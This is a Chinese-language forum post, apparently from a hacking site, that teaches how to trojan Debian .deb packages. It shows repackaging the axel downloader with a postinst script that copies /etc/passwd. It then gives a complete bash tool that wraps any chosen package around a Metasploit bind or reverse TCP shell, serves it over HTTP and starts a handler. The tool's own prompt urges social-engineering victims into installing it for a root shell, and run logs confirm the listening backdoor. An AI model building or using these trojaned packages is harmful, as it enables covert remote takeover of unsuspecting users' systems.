切换风格

Wizard Sky California Sunset glow Black Cloud Beige Dragon Lavender NewYear City Snow Flowers London
收藏本站XSS平台字符串转换jsfuck
179 DEB包 LINUX 后门制作[复制链接]
发表于 2012-10-2 15:49:15 | 显示全部楼层 |!read_mode!
关于deb

DEB是Debian软件包格式的文件扩展名,跟Debian的命名一样,DEB也是因Debra Murdock而得名,她是Debian创始人Ian Murdock的太太。Debian包是Unixar的标准归档,将包文件信息以及包内容,经过gzip和tar打包而成。
处理这些包的经典程序是dpkg,经常是通过Debian的apt-get来运作

我们先来安装一个软件:axel

  1. root@Dis9Team:~# apt-get install axel
  2. Reading package lists... Done
  3. Building dependency tree      
  4. Reading state information... Done
  5. The following NEW packages will be installed:
  6.   axel
  7. 0 upgraded, 1 newly installed, 0 to remove and 305 not upgraded.
  8. Need to get 51.5 kB of archives.
  9. After this operation, 221 kB of additional disk space will be used.
  10. Get:1 http://mirrors.163.com/ubuntu/ natty/universe axel i386 2.4-1 [51.5 kB]
  11. Fetched 51.5 kB in 3s (14.5 kB/s)
  12. Selecting previously deselected package axel.
  13. (Reading database ... 161355 files and directories currently installed.)
  14. Unpacking axel (from .../archives/axel_2.4-1_i386.deb) ...
  15. Processing triggers for man-db ...
  16. Setting up axel (2.4-1) ...
  17. root@Dis9Team:~#
复制代码
通过搜索你的源中本地储存来通过HTTP获得,本地安装并且储存在本地文件夹里面

  1. root@Dis9Team:~# ls /var/cache/apt/archives/axel*
  2. /var/cache/apt/archives/axel_2.4-1_i386.deb
  3. root@Dis9Team:~#
复制代码
加入后门 我们可以再其中绑入后门,我们能执行伪造信息

  1. root@Dis9Team:/tmp# dpkg -x /var/cache/apt/archives/axel_2.4-1_i386.deb /tmp/axel
  2. root@Dis9Team:/tmp# cd axel/
  3. root@Dis9Team:/tmp/axel# ls
  4. etc  usr
  5. root@Dis9Team:/tmp/axel#
  6. root@Dis9Team:/tmp/axel# mkdir DEBIAN
  7. root@Dis9Team:/tmp/axel# cd DEBIAN/
  8. root@Dis9Team:/tmp/axel/DEBIAN# vi control
  9. root@Dis9Team:/tmp/axel/DEBIAN# cat control
  10. Package: axel
  11. Version: 0.1
  12. Section: Games and Amusement
  13. Priority: optional
  14. Architecture: i386
  15. Maintainer: Ubuntu MOTU Developers (ubuntu-motu@lists.ubuntu.com)
  16. Description: Download tools
  17. root@Dis9Team:/tmp/axel/DEBIAN#
复制代码

写入我们的后门

  1. root@Dis9Team:/tmp/axel/DEBIAN# cat postinst
  2. #!/bin/sh
  3. sudo cat /etc/passwd > /tmp/1
  4. root@Dis9Team:/tmp/axel/DEBIAN#
复制代码

制作DEB包

  1. root@Dis9Team:/tmp/axel/DEBIAN# chmod 775 postinst
  2. root@Dis9Team:/tmp/axel/DEBIAN# dpkg-deb --build /tmp/axel
  3. dpkg-deb: building package `axel' in `/tmp/axel.deb'.
  4. root@Dis9Team:/tmp/axel/DEBIAN# file axel.deb
  5. axel.deb: Debian binary package (format 2.0)
复制代码

然后发送给Helen,当Helen运行以后我能就可以控制他的电脑
我们运行下试试

  1. root@Dis9Team:/tmp/axel/DEBIAN# dpkg -i /tmp/axel.deb
  2. (Reading database ... 161419 files and directories currently installed.)
  3. Preparing to replace axel 0.1 (using /tmp/axel.deb) ...
  4. Unpacking replacement axel ...
  5. Setting up axel (0.1) ...
  6. sudo: unable to resolve host Dis9Team
  7. Processing triggers for man-db ...
复制代码

运行成功了。我们包含的命令是 sudo cat /etc/passwd > /tmp/1 看下这个文件

  1. root@Dis9Team:/tmp/axel/DEBIAN# cat /tmp/1
  2. root:x:0:0:root:/root:/bin/bash
  3. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  4. bin:x:2:2:bin:/bin:/bin/sh
  5. sys:x:3:3:sys:/dev:/bin/sh
  6. sync:x:4:65534:sync:/bin:/bin/sync
  7. games:x:5:60:games:/usr/games:/bin/sh
  8. man:x:6:12:man:/var/cache/man:/bin/sh
  9. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  10. mail:x:8:8:mail:/var/mail:/bin/sh
  11. news:x:9:9:news:/var/spool/news:/bin/sh
  12. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  13. proxy:x:13:13:proxy:/bin:/bin/sh
  14. www-data:x:33:33:www-data:/var/www:/bin/sh
  15. backup:x:34:34:backup:/var/backups:/bin/sh
  16. list:x:38:38:Mailing List Manager:/var/list:/bin/sh
  17. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  18. gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
  19. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  20. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  21. syslog:x:101:103::/home/syslog:/bin/false
  22. messagebus:x:102:105::/var/run/dbus:/bin/false
  23. avahi-autoipd:x:103:108:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
  24. avahi:x:104:109:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
  25. usbmux:x:105:46:usbmux daemon,,,:/home/usbmux:/bin/false
  26. gdm:x:106:114:Gnome Display Manager:/var/lib/gdm:/bin/false
  27. speech-dispatcher:x:107:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
  28. kernoops:x:108:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
  29. pulse:x:109:116:PulseAudio daemon,,,:/var/run/pulse:/bin/false
  30. rtkit:x:110:119:RealtimeKit,,,:/proc:/bin/false
  31. hplip:x:111:7:HPLIP system user,,,:/var/run/hplip:/bin/false
  32. saned:x:112:121::/home/saned:/bin/false
  33. brk:x:1000:1000:Dis9Team,,,:/home/brk:/bin/bash
  34. postgres:x:113:123:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
  35. smmta:x:114:124:Mail Transfer Agent,,,:/var/lib/sendmail:/bin/false
  36. smmsp:x:115:125:Mail Submission Program,,,:/var/lib/sendmail:/bin/false
  37. vboxadd:x:999:1::/var/run/vboxadd:/bin/false
  38. root@Dis9Team:/tmp/axel/DEBIAN#
复制代码
说明成功执行了命令自动后门可以捆绑木马吗? 能的,一个自动脚本
  1. #!/bin/bash
  2.      
  3.     # bash script to generate a Debian (.deb) package trojan using Metasploit payload
  4.     # Author:  Aaron Hine - @redmeat_uk
  5.     # Date: 31-01-2010
  6.      
  7.     # Disclaimer: this script should be used for educational purposes.  You should obtain permission before running this against an indvidual or company.  
  8.     # The author is not liable for any illegal use of this script.
  9.      
  10.     scriptname=`basename "$0"`
  11.      
  12.       if [[ $UID -ne 0 ]]; then
  13.          echo "${scriptname} must be run as root"
  14.          exit 1
  15.       fi
  16.      
  17.     #
  18.     echo
  19.     echo "#####################################################################"
  20.     echo "Script to generate a Debian package trojan using a Metasploit payload"
  21.     echo "#####################################################################"
  22.     echo
  23.      
  24.     # change these vars to suit your needs
  25.     msfdir="/opt/metasploit3/msf3"
  26.     tmpdir="/tmp/evildeb"
  27.     workdir="$tmpdir/work"
  28.      
  29.     # prompt for package name and setup dirs
  30.     echo "Please enter the name of the APT package you wish to trojan:"
  31.     echo "Use apt-cache search <package> for ideas :)"
  32.     echo
  33.     read package
  34.     apt-get --download-only install $package
  35.     echo
  36.     mkdir $tmpdir
  37.     mkdir $workdir
  38.     mv /var/cache/apt/archives/$package* $tmpdir
  39.     mkdir $workdir/DEBIAN
  40.     dpkg -x $tmpdir/$package* $workdir
  41.     apt-cache show $package > $workdir/DEBIAN/control
  42.     cat $workdir/DEBIAN/control | sed '/^Original-Maintainer/d' | sed '/^SHA/d' > $workdir/DEBIAN/control2
  43.     mv $workdir/DEBIAN/control2 $workdir/DEBIAN/control
  44.     echo
  45.     echo "Please choose your Metasploit payload"
  46.     echo "-------------------------------------"
  47.     echo
  48.     echo "1. bind tcp"
  49.     echo "2. reverse tcp"
  50.     echo
  51.     echo "press number and hit return:"
  52.     read choice
  53.      
  54.      
  55.     if [ "$choice" -eq 1 ]; then
  56.             payload="linux/x86/shell/bind_tcp"
  57.                     echo "Enter IP:"
  58.                     read rhostIP
  59.                     echo "Enter port:"
  60.                     read bindport
  61.                     options="RHOST=$rhostIP LPORT=$bindport"
  62.     else
  63.             if [ "$choice" -eq 2 ]; then
  64.                     payload="linux/x86/shell/reverse_tcp"
  65.                     echo "Enter IP:"
  66.                     read lhostIP
  67.                     echo "Enter port:"
  68.                     read revport
  69.                     options="LHOST=$lhostIP LPORT=$revport"
  70.             fi
  71.     fi
  72.      
  73.     echo
  74.     echo "Please enter the filename for the Metasploit payload:"
  75.     read filename
  76.     echo
  77.      
  78.     cd $workdir
  79.     binary=`find . -executable -type f | grep $package | sed -e 's/^.//'`
  80.     trojan="$filename"
  81.      
  82.     echo "Making post-install script..."
  83.     echo
  84.      
  85.     echo "#!/bin/sh" > $workdir/DEBIAN/postinst
  86.     echo "" >> $workdir/DEBIAN/postinst
  87.     echo "" >> $workdir/DEBIAN/postinst
  88.     echo "sudo chmod 2755 $binary$trojan && $binary$trojan & $binary &" >> $workdir/DEBIAN/postinst
  89.      
  90.     trojan2=`echo $binary$trojan | sed -e 's/^\///'`
  91.      
  92.     echo "Thanks - generating your payload..."
  93.     $msfdir/msfpayload $payload $options X > $workdir/$trojan2
  94.     echo
  95.      
  96.     cd $workdir/DEBIAN
  97.     chmod 755 postinst
  98.     dpkg-deb --build $workdir
  99.     cd $tmpdir
  100.      
  101.     echo
  102.     echo "Please enter your webroot directory:"
  103.     read webroot
  104.     mv $tmpdir/work.deb $webroot/$package.deb
  105.     rm -rf $tmpdir
  106.      
  107.     echo
  108.     echo "Trojan'd $package.deb created and placed in $webroot"
  109.     echo
  110.      
  111.     webserver="python -m SimpleHTTPServer 80"
  112.      
  113.     echo "Would you like a Python webserver ? (y/n) :"
  114.     read svr
  115.     echo
  116.      
  117.     if [[ "$svr" == "y" || "$svr" == "Y" ]]; then
  118.             cd $webroot
  119.             $webserver &
  120.             echo
  121.             else
  122.                echo "Fair nuff, setup your own webserver :)"
  123.                echo
  124.     fi
  125.      
  126.     sleep 1
  127.      
  128.     echo "Would you like me to setup a metasploit handler ? (y/n) :"
  129.     echo
  130.     read handler
  131.     echo
  132.     echo "In the meantime, social engineer your victim in to browsing to your package"
  133.     echo "and get them to install it and wait for your root shell >)"
  134.     echo
  135.      
  136.     if [[ "$handler" == "y" || "$handler" == "Y" ]]; then
  137.             echo
  138.             $msfdir/msfcli exploit/multi/handler payload=$payload $options E
  139.             else
  140.                     echo "Fair nuff, setup your own handler :)"
  141.                     echo
  142.     fi
复制代码

保存运行
  1. root@Dis9Team:/tmp# ./deb_door.sh

  2. #####################################################################
  3. Script to generate a Debian package trojan using a Metasploit payload
  4. #####################################################################

  5. Please enter the name of the APT package you wish to trojan:
  6. Use apt-cache search <package> for ideas :)

  7. axel
  8. Reading package lists... Done
  9. Building dependency tree      
  10. Reading state information... Done
  11. The following packages will be upgraded:
  12.   axel
  13. 1 upgraded, 0 newly installed, 0 to remove and 305 not upgraded.
  14. Need to get 51.5 kB of archives.
  15. After this operation, 221 kB of additional disk space will be used.
  16. Get:1 http://mirrors.163.com/ubuntu/ natty/universe axel i386 2.4-1 [51.5 kB]
  17. Fetched 51.5 kB in 3s (15.2 kB/s)
  18. Download complete and in download only mode

  19. mkdir: cannot create directory `/tmp/evildeb': File exists
  20. mkdir: cannot create directory `/tmp/evildeb/work': File exists
  21. mkdir: cannot create directory `/tmp/evildeb/work/DEBIAN': File exists

  22. Please choose your Metasploit payload
  23. -------------------------------------

  24. 1. bind tcp
  25. 2. reverse tcp

  26. press number and hit return:
  27. 1
  28. Enter IP:
  29. 5.5.5.2
  30. Enter port:
  31. 4444

  32. Please enter the filename for the Metasploit payload:


  33. Making post-install script...

  34. Thanks - generating your payload...

  35. Created by msfpayload (http://www.metasploit.com).
  36. Payload: linux/x86/shell/bind_tcp
  37. Length: 63
  38. Options: {"RHOST"=>"5.5.5.2", "LPORT"=>"4444"}

  39. dpkg-deb: error: parsing file '/tmp/evildeb/work/DEBIAN/control' near line 22 package 'axel':
  40. value for `status' field not allowed in this context

  41. Please enter your webroot directory:
  42. mv: cannot stat `/tmp/evildeb/work.deb': No such file or directory

  43. Trojan'd axel.deb created and placed in

  44. Would you like a Python webserver ? (y/n) :
  45. n

  46. Fair nuff, setup your own webserver :)

  47. Would you like me to setup a metasploit handler ? (y/n) :

  48. n
复制代码

木马保存在/tmp/evildeb/work.deb
  1. root@Dis9Team:/tmp# cd evildeb/
  2. root@Dis9Team:/tmp/evildeb# tree
  3. .
  4. ├── axel_2.4-1_i386.deb
  5. └── work
  6.     ├── DEBIAN
  7.     │   └── control
  8.     ├── etc
  9.     │   └── axelrc
  10.     └── usr
  11.         ├── bin
  12.         │   └── axel
  13.         └── share
  14.             ├── doc
  15.             │   └── axel
  16.             │       ├── API.gz
  17.             │       ├── changelog.Debian.gz
  18.             │       ├── changelog.gz
  19.             │       ├── copyright
  20.             │       ├── CREDITS
  21.             │       ├── examples
  22.             │       │   └── axelrc.example
  23.             │       ├── README
  24.             │       └── README.source
  25.             ├── locale
  26.             │   ├── de
  27.             │   │   └── LC_MESSAGES
  28.             │   │       └── axel.mo
  29.             │   ├── nl
  30.             │   │   └── LC_MESSAGES
  31.             │   │       └── axel.mo
  32.             │   ├── ru
  33.             │   │   └── LC_MESSAGES
  34.             │   │       └── axel.mo
  35.             │   └── zh_CN
  36.             │       └── LC_MESSAGES
  37.             │           └── axel.mo
  38.             └── man
  39.                 ├── man1
  40.                 │   └── axel.1.gz
  41.                 └── zh_CN
  42.                     └── man1
  43.                         └── axel.1.gz

  44. 22 directories, 18 files
  45. root@Dis9Team:/tmp/evildeb#
复制代码

查看它信息
  1. root@Dis9Team:/tmp/evildeb# cat work/DEBIAN/control
  2. Package: axel
  3. Priority: optional
  4. Section: universe/web
  5. Installed-Size: 216
  6. Maintainer: Ubuntu MOTU Developers <ubuntu-motu@lists.ubuntu.com>
  7. Architecture: i386
  8. Version: 2.4-1
  9. Depends: libc6 (>= 2.4)
  10. Filename: pool/universe/a/axel/axel_2.4-1_i386.deb
  11. Size: 51456
  12. MD5sum: e5a4e5a1741cd21919a46766e24e449b
  13. Description: light download accelerator - console version
  14. Axel tries to accelerate the downloading process by using multiple connections
  15. for one file.  It can also use multiple mirrors for one download.  Axel tries
  16. to be as light as possible (25-30k in binary form), so it might be useful as a
  17. wget clone on byte-critical systems.
  18. Homepage: http://axel.alioth.debian.org/
  19. Bugs: https://bugs.launchpad.net/ubuntu/+filebug
  20. Origin: Ubuntu

  21. root@Dis9Team:/tmp/evildeb#
复制代码

伪装的不错 安装它
  1. root@Dis9Team:/tmp/evildeb# dpkg -i axel_2.4-1_i386.deb
  2. Selecting previously deselected package axel.
  3. (Reading database ... 161401 files and directories currently installed.)
  4. Unpacking axel (from axel_2.4-1_i386.deb) ...
  5. Setting up axel (2.4-1) ...
  6. Processing triggers for man-db ...
  7. root@Dis9Team:/tmp/evildeb#
复制代码

查看本地端口
  1. root@Dis9Team:/var/www# netstat -antp | grep 4444
  2. tcp        0      0 0.0.0.0:4444            0.0.0.0:*               LISTEN      2975/axelaxel   
  3. root@Dis9Team:/var/www#
复制代码



操千曲而后晓声,观千剑而后识器。

代码区

GMT+8, 2020-11-29 08:52

Powered by Discuz! X2

© 2001-2018 Comsenz Inc.

回顶部